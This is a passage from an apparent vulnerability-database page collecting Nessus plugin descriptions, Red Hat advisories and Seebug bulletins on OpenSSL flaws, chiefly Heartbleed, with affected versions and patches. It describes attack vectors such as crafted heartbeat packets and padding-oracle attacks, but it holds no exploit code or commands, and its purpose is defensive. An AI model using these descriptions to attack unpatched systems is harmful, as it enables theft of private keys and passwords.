(CVE-2009-1379) - The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a plaintext injection attack, aka the Project Mogul issue. (CVE-2009-3555) - Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678. (CVE-2009-4355) - The Cryptographic Message Syntax (CMS) implementation in crypto/cms/cms_asn1.c in OpenSSL before 0.9.8o and 1.x before 1.0.0a does not properly handle structures that contain OriginatorInfo, which allows context-dependent attackers to modify invalid memory locations or conduct double-free attacks, and possibly execute arbitrary code, via unspecified vectors. (CVE-2010-0742) - RSA verification recovery in the EVP_PKEY_verify_recover function in OpenSSL 1.x before 1.0.0a, as used by pkeyutl and possibly other applications, returns uninitialized memory upon failure, which might allow context-dependent attackers to bypass intended key requirements or obtain sensitive information via unspecified vectors. NOTE: some of these details are obtained from third party information. 
(CVE-2010-1633) - Multiple race conditions in ssl/t1_lib.c in OpenSSL 0.9.8f through 0.9.8o, 1.0.0, and 1.0.0a, when multi-threading and internal caching are enabled on a TLS server, might allow remote attackers to execute arbitrary code via client data that triggers a heap-based buffer overflow, related to (1) the TLS server name extension and (2) elliptic curve cryptography. (CVE-2010-3864) - OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the downgrade to an unintended cipher via vectors involving sniffing network traffic to discover a session identifier. (CVE-2010-4180) - ssl/t1_lib.c in OpenSSL 0.9.8h through 0.9.8q and 1.0.0 through 1.0.0c allows remote attackers to cause a denial of service (crash), and possibly obtain sensitive information in applications that use OpenSSL, via a malformed ClientHello handshake message that triggers an out-of-bounds memory access, aka OCSP stapling vulnerability. (CVE-2011-0014) - crypto/x509/x509_vfy.c in OpenSSL 1.0.x before 1.0.0e does not initialize certain structure members, which makes it easier for remote attackers to bypass CRL validation by using a nextUpdate value corresponding to a time in the past. (CVE-2011-3207) - OpenSSL 0.9.8s and 1.0.0f does not properly support DTLS applications, which allows remote attackers to cause a denial of service (crash) via unspecified vectors related to an out-of-bounds read. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-4108. 
(CVE-2012-0050) - The asn1_d2i_read_bio function in crypto/asn1/a_d2i_fp.c in OpenSSL before 0.9.8v, 1.0.0 before 1.0.0i, and 1.0.1 before 1.0.1a does not properly interpret integer data, which allows remote attackers to conduct buffer overflow attacks, and cause a denial of service (memory corruption) or possibly have unspecified other impact, via crafted DER data, as demonstrated by an X.509 certificate or an RSA public key. (CVE-2012-2110) - The ssl3_take_mac function in ssl/s3_both.c in OpenSSL 1.0.1 before 1.0.1f allows remote TLS servers to cause a denial of service (NULL pointer dereference and application crash) via a crafted Next Protocol Negotiation record in a TLS handshake. (CVE-2013-4353) - The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client. (CVE-2013-6449) - The DTLS retransmission implementation in OpenSSL 1.0.0 before 1.0.0l and 1.0.1 before 1.0.1f does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context and cause a denial of service (application crash) by interfering with packet delivery, related to ssl/d1_both.c and ssl/t1_enc.c. (CVE-2013-6450) - An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) - A flaw was found in the way SSL 3.0 handled padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode. 
This flaw allows a man-in-the-middle (MITM) attacker to decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections. (CVE-2014-3566) - A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. (CVE-2016-2183) Note that Nessus has not tested for this issue but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id127201
    published2019-08-12
    reporterThis script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/127201
    titleNewStart CGSL CORE 5.04 / MAIN 5.04 : openssl Multiple Vulnerabilities (NS-SA-2019-0033)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2014-0396.NASL
    descriptionAn updated rhev-hypervisor6 package that fixes one security issue is now available for Red Hat Enterprise Virtualization Hypervisor 3.2. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. The rhev-hypervisor6 package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: a subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent. Important: This update is an emergency security fix being provided outside the scope of the published support policy for Red Hat Enterprise Virtualization listed in the References section. In accordance with the support policy for Red Hat Enterprise Virtualization, Red Hat Enterprise Virtualization Hypervisor 3.2 will not receive future security updates. Note: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. 
Users of the Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to this updated package, which corrects this issue.
    last seen2020-06-01
    modified2020-06-02
    plugin id79008
    published2014-11-08
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/79008
    titleRHEL 6 : rhev-hypervisor6 (RHSA-2014:0396) (Heartbleed)
  • NASL familyWindows
    NASL idOPENVPN_2_3_3_0.NASL
    descriptionAccording to its self-reported version number, the version of OpenVPN installed on the remote host is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73668
    published2014-04-22
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73668
    titleOpenVPN 2.3.x Heartbeat Information Disclosure (Heartbleed)
  • NASL familyRed Hat Local Security Checks
    NASL idHP_VCA_SSRT101531-RHEL.NASL
    descriptionThe RPM installation of HP Version Control Agent (VCA) on the remote Linux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id77022
    published2014-08-06
    reporterThis script is Copyright (C) 2014-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/77022
    titleHP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)
  • NASL familySolaris Local Security Checks
    NASL idSOLARIS11_OPENSSL_20140731.NASL
    descriptionThe remote Solaris system is missing necessary patches to address security updates : - The ssl3_take_mac function in ssl/s3_both.c in OpenSSL 1.0.1 before 1.0.1f allows remote TLS servers to cause a denial of service (NULL pointer dereference and application crash) via a crafted Next Protocol Negotiation record in a TLS handshake. (CVE-2013-4353) - The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0.2 obtains a certain version number from an incorrect data structure, which allows remote attackers to cause a denial of service (daemon crash) via crafted traffic from a TLS 1.2 client. (CVE-2013-6449) - The DTLS retransmission implementation in OpenSSL 1.0.0 before 1.0.0l and 1.0.1 before 1.0.1f does not properly maintain data structures for digest and encryption contexts, which might allow man-in-the-middle attackers to trigger the use of a different context and cause a denial of service (application crash) by interfering with packet delivery, related to ssl/d1_both.c and ssl/t1_enc.c. (CVE-2013-6450) - The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack. (CVE-2014-0076) - The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug. (CVE-2014-0160)
    last seen2020-06-01
    modified2020-06-02
    plugin id80721
    published2015-01-19
    reporterThis script is Copyright (C) 2015-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/80721
    titleOracle Solaris Third-Party Patch Update : openssl (multiple_vulnerabilities_in_openssl4) (Heartbleed)
  • NASL familyGentoo Local Security Checks
    NASL idGENTOO_GLSA-201412-11.NASL
    descriptionThe remote host is affected by the vulnerability described in GLSA-201412-11 (AMD64 x86 emulation base libraries: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in AMD64 x86 emulation base libraries. Please review the CVE identifiers referenced below for details. Impact : A context-dependent attacker may be able to execute arbitrary code, cause a Denial of Service condition, or obtain sensitive information. Workaround : There is no known workaround at this time.
    last seen2020-06-01
    modified2020-06-02
    plugin id79964
    published2014-12-15
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/79964
    titleGLSA-201412-11 : AMD64 x86 emulation base libraries: Multiple vulnerabilities (Heartbleed)
  • NASL familyMisc.
    NASL idIPSWITCH_IMAIL_12_4_1_15.NASL
    descriptionThe remote host appears to be running Ipswitch IMail Server 11.x or 12.x older than version 12.4.1.15 and is, therefore, potentially affected by the following vulnerabilities : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id76490
    published2014-07-14
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76490
    titleIpswitch IMail Server 11.x / 12.x < 12.4.1.15 Multiple Vulnerabilities (Heartbleed)
  • NASL familyWindows
    NASL idIBM_GPFS_ISG3T1020683.NASL
    descriptionA version of IBM General Parallel File System (GPFS) prior to 3.5.0.17 is installed on the remote host. It is, therefore, affected by multiple vulnerabilities related to OpenSSL: - An information disclosure vulnerability exists due to a flaw in the OpenSSL library, due to an implementation error in ECDSA (Elliptic Curve Digital Signature Algorithm). An attacker could potentially exploit this vulnerability to recover ECDSA nonces. (CVE-2014-0076) - An information disclosure vulnerability exists due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device. (CVE-2014-0160)
    last seen2020-06-01
    modified2020-06-02
    plugin id74104
    published2014-05-20
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/74104
    titleIBM General Parallel File System 3.5 < 3.5.0.17 Multiple OpenSSL Vulnerabilities (Heartbleed)
  • NASL familyMisc.
    NASL idVMWARE_HORIZON_WORKSPACE_VMSA2014-0004.NASL
    descriptionThe version of VMware Horizon Workspace installed on the remote host is version 1.8.x prior to 1.8.1. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73896
    published2014-05-06
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73896
    titleVMware Horizon Workspace 1.8 < 1.8.1 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Heartbleed)
  • NASL familyMisc.
    NASL idOPENSSL_HEARTBLEED.NASL
    descriptionBased on its response to a TLS request with a specially crafted heartbeat message (RFC 6520), the remote service appears to be affected by an out-of-bounds read flaw. This flaw could allow a remote attacker to read the contents of up to 64KB of server memory, potentially exposing passwords, private keys, and other sensitive data.
    last seen2019-10-28
    modified2014-04-08
    plugin id73412
    published2014-04-08
    reporterThis script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73412
    titleOpenSSL Heartbeat Information Disclosure (Heartbleed)
  • NASL familyWindows
    NASL idATTACHMATE_REFLECTION_SECURE_IT_FOR_WIN_CLIENT_HEARTBLEED.NASL
    descriptionThe Attachmate Reflection Secure IT Windows Client install on the remote host contains a component, Reflection FTP Client, which is affected by an out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id73965
    published2014-05-12
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73965
    titleAttachmate Reflection Secure IT Windows Client Information Disclosure (Heartbleed)
  • NASL familyMisc.
    NASL idMCAFEE_EPO_SB10071.NASL
    descriptionThe remote host is running a version of McAfee ePolicy Orchestrator that is affected by an information disclosure due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device.
    last seen2020-06-01
    modified2020-06-02
    plugin id73833
    published2014-05-02
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73833
    titleMcAfee ePolicy Orchestrator OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familyAmazon Linux Local Security Checks
    NASL idALA_ALAS-2014-320.NASL
    descriptionA missing bounds check was found in the way OpenSSL handled TLS heartbeat extension packets. This flaw could be used to reveal up to 64k of memory from a connected client or server.
    last seen2020-06-01
    modified2020-06-02
    plugin id73438
    published2014-04-09
    reporterThis script is Copyright (C) 2014-2015 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/73438
    titleAmazon Linux AMI : openssl Information Disclosure Vulnerability (ALAS-2014-320)
  • NASL familySuSE Local Security Checks
    NASL idOPENSUSE-2014-318.NASL
    descriptionThis is an openssl version update to 1.0.1g. - The main reason for this upgrade was to be clear about the TLS heartbeat problem known as
    last seen2020-06-05
    modified2014-06-13
    plugin id75331
    published2014-06-13
    reporterThis script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/75331
    titleopenSUSE Security Update : openssl (openSUSE-SU-2014:0560-1) (Heartbleed)
  • NASL familyWindows
    NASL idLIBREOFFICE_423.NASL
    descriptionA version of LibreOffice 4.2.x prior to 4.2.3 is installed on the remote Windows host. This version of LibreOffice is bundled with a version of OpenSSL affected by multiple vulnerabilities : - An error exists in the function
    last seen2020-06-01
    modified2020-06-02
    plugin id76510
    published2014-07-15
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/76510
    titleLibreOffice 4.2.x < 4.2.3 OpenSSL Multiple Vulnerabilities (Heartbleed)
  • NASL familyMisc.
    NASL idMCAFEE_VSEL_SB10071.NASL
    descriptionThe remote host has a version of McAfee VirusScan Enterprise for Linux (VSEL) that is affected by an information disclosure due to a flaw in the OpenSSL library, commonly known as the Heartbleed bug. An attacker could potentially exploit this vulnerability repeatedly to read up to 64KB of memory from the device.
    last seen2020-06-01
    modified2020-06-02
    plugin id73854
    published2014-05-03
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73854
    titleMcAfee VirusScan Enterprise for Linux OpenSSL Information Disclosure (SB10071) (Heartbleed)
  • NASL familyMandriva Local Security Checks
    NASL idMANDRIVA_MDVSA-2015-062.NASL
    descriptionMultiple vulnerabilities have been discovered and corrected in openssl : Race condition in the ssl3_read_bytes function in s3_pkt.c in OpenSSL through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, allows remote attackers to inject data across sessions or cause a denial of service (use-after-free and parsing error) via an SSL connection in a multithreaded environment (CVE-2010-5298). The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack (CVE-2014-0076). The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug (CVE-2014-0160). The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment (CVE-2014-0195). The do_ssl3_write function in s3_pkt.c in OpenSSL 1.x through 1.0.1g, when SSL_MODE_RELEASE_BUFFERS is enabled, does not properly manage a buffer pointer during certain recursive calls, which allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via vectors that trigger an alert condition (CVE-2014-0198). 
The dtls1_get_message_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h allows remote attackers to cause a denial of service (recursion and client crash) via a DTLS hello message in an invalid DTLS handshake (CVE-2014-0221). OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224). The ssl3_send_client_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h, when an anonymous ECDH cipher suite is used, allows remote attackers to cause a denial of service (NULL pointer dereference and client crash) by triggering a NULL certificate value (CVE-2014-3470). Memory leak in d1_srtp.c in the DTLS SRTP extension in OpenSSL 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted handshake message (CVE-2014-3513). The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue (CVE-2014-3566). Memory leak in the tls_decrypt_ticket function in t1_lib.c in OpenSSL before 0.9.8zc, 1.0.0 before 1.0.0o, and 1.0.1 before 1.0.1j allows remote attackers to cause a denial of service (memory consumption) via a crafted session ticket that triggers an integrity-check failure (CVE-2014-3567). 
The ssl23_get_client_hello function in s23_srvr.c in OpenSSL 0.9.8zc, 1.0.0o, and 1.0.1j does not properly handle attempts to use unsupported protocols, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an unexpected handshake, as demonstrated by an SSLv3 handshake to a no-ssl3 application with certain error handling. NOTE: this issue became relevant after the CVE-2014-3568 fix (CVE-2014-3569). The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c (CVE-2014-3570). OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted DTLS message that is processed with a different read operation for the handshake header than for the handshake body, related to the dtls1_get_record function in d1_pkt.c and the ssl3_read_n function in s3_pkt.c (CVE-2014-3571). The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message (CVE-2014-3572). OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate
    last seen2020-06-01
    modified2020-06-02
    plugin id82315
    published2015-03-30
    reporterThis script is Copyright (C) 2015-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/82315
    titleMandriva Linux Security Advisory : openssl (MDVSA-2015:062)
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2014-0377.NASL
    descriptionUpdated openssl packages that fix one security issue are now available for Red Hat Storage 2.1. The Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library. An information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys. (CVE-2014-0160) Red Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter. All users of Red Hat Storage are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
    last seen2020-06-01
    modified2020-06-02
    plugin id79005
    published2014-11-08
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/79005
    titleRHEL 6 : Storage Server (RHSA-2014:0377) (Heartbleed)
  • NASL familyWindows
    NASL idKASPERSKY_INTERNET_SECURITY_HEARTBLEED.NASL
    descriptionThe remote host has a version of Kaspersky Internet Security (KIS) installed that is missing a vendor patch. It is, therefore, affected by an information disclosure vulnerability. An out-of-bounds read error, known as the
    last seen2020-06-01
    modified2020-06-02
    plugin id77437
    published2014-08-29
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/77437
    titleKaspersky Internet Security Heartbeat Information Disclosure (Heartbleed)
  • NASL familyMisc.
    NASL idOPENVPN_HEARTBLEED.NASL
    descriptionBased on its response to a TLS request with a specially crafted heartbeat message (RFC 6520), the remote OpenVPN service appears to be affected by an out-of-bounds read flaw. Because the remote OpenVPN service does not employ the
    last seen2020-06-01
    modified2020-06-02
    plugin id73491
    published2014-04-14
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73491
    titleOpenVPN Heartbeat Information Disclosure (Heartbleed)
  • NASL familyGeneral
    NASL idVMWARE_PLAYER_LINUX_6_0_2.NASL
    descriptionThe installed version of VMware Player 6.x running on Linux is prior to 6.0.2. It is, therefore, reportedly affected by the following vulnerabilities in the OpenSSL library : - An error exists related to the implementation of the Elliptic Curve Digital Signature Algorithm (ECDSA) that could allow nonce disclosure via the
    last seen2020-06-01
    modified2020-06-02
    plugin id73671
    published2014-04-21
    reporterThis script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/73671
    titleVMware Player 6.x < 6.0.2 OpenSSL Library Multiple Vulnerabilities (VMSA-2014-0004) (Linux) (Heartbleed)

Packetstorm

Redhat

advisories
  • bugzilla
    id1084875
    titleCVE-2014-0160 openssl: information disclosure in handling of TLS heartbeat extension packets
    oval
    OR
    • commentRed Hat Enterprise Linux must be installed
      ovaloval:com.redhat.rhba:tst:20070304026
    • AND
      • commentRed Hat Enterprise Linux 6 is installed
        ovaloval:com.redhat.rhba:tst:20111656003
      • OR
        • AND
          • commentopenssl-devel is earlier than 0:1.0.1e-16.el6_5.7
            ovaloval:com.redhat.rhsa:tst:20140376001
          • commentopenssl-devel is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhba:tst:20171929002
        • AND
          • commentopenssl is earlier than 0:1.0.1e-16.el6_5.7
            ovaloval:com.redhat.rhsa:tst:20140376003
          • commentopenssl is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhba:tst:20171929008
        • AND
          • commentopenssl-static is earlier than 0:1.0.1e-16.el6_5.7
            ovaloval:com.redhat.rhsa:tst:20140376005
          • commentopenssl-static is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhba:tst:20171929006
        • AND
          • commentopenssl-perl is earlier than 0:1.0.1e-16.el6_5.7
            ovaloval:com.redhat.rhsa:tst:20140376007
          • commentopenssl-perl is signed with Red Hat redhatrelease2 key
            ovaloval:com.redhat.rhba:tst:20171929004
    rhsa
    idRHSA-2014:0376
    released2014-04-08
    severityImportant
    titleRHSA-2014:0376: openssl security update (Important)
  • rhsa
    idRHSA-2014:0377
  • rhsa
    idRHSA-2014:0378
  • rhsa
    idRHSA-2014:0396
rpms
  • openssl-0:1.0.1e-16.el6_5.7
  • openssl-debuginfo-0:1.0.1e-16.el6_5.7
  • openssl-devel-0:1.0.1e-16.el6_5.7
  • openssl-perl-0:1.0.1e-16.el6_5.7
  • openssl-static-0:1.0.1e-16.el6_5.7
  • rhev-hypervisor6-0:6.5-20140407.0.el6ev
  • rhev-hypervisor6-0:6.5-20140118.1.3.2.el6_5
  • rhevm-spice-client-x64-cab-0:3.3-12.el6_5
  • rhevm-spice-client-x64-msi-0:3.3-12.el6_5
  • rhevm-spice-client-x86-cab-0:3.3-12.el6_5
  • rhevm-spice-client-x86-msi-0:3.3-12.el6_5

Seebug

  • bulletinFamilyexploit
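    descriptionCVE ID:CVE-2014-0160 McAfee Email Gateway is a comprehensive email security solution. The OpenSSL bundled with McAfee Email Gateway has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 McAfee Email Gateway 7.x The vendor has released an upgrade patch that fixes the vulnerability; download it from: https://kc.mcafee.com/corporate/index?page=content&id=SB10071
    idSSV:62192
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleMcAfee Email Gateway OpenSSL TLS Heartbeat Information Disclosure Vulnerability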
  • bulletinFamilyexploit
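    descriptionCVE ID:CVE-2014-0160 McAfee Endpoint Intelligence Agent is a network service used in McAfee products. The OpenSSL bundled with McAfee Endpoint Intelligence Agent has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 McAfee Endpoint Intelligence Agent 1.x (Formerly Network Integrity Agent) McAfee Endpoint Intelligence Agent 2.2.1 fixes this vulnerability; users are advised to download it from: http://www.mcafee.com
    idSSV:62238
    last seen2017-11-19
    modified2014-04-21
    published2014-04-21
    reporterRoot
    titleMcAfee Endpoint Intelligence Agent OpenSSL TLS Heartbeat Information Disclosure Vulnerability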
  • bulletinFamilyexploit
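    descriptionCVE ID:CVE-2014-0160 IBM AIX is a commercial operating system. The OpenSSL bundled with IBM AIX has a security vulnerability: a boundary error in OpenSSL's handling of the TLS "heartbeat" extension allows attackers to exploit the vulnerability to obtain 64k of memory contents from a connected client or server. The memory contents may include private keys, usernames, passwords, and so on. 0 IBM AIX 6.x IBM AIX 7.x Users can refer to the following vendor-provided security patches to fix this vulnerability: http://aix.software.ibm.com/aix/efixes/security/openssl_advisory7.doc http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq?mode=18&ID=3489
    idSSV:62187
    last seen2017-11-19
    modified2014-04-16
    published2014-04-16
    reporterRoot
    titleIBM AIX OpenSSL TLS Heartbeat Information Disclosure Vulnerability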
  • bulletinFamilyexploit
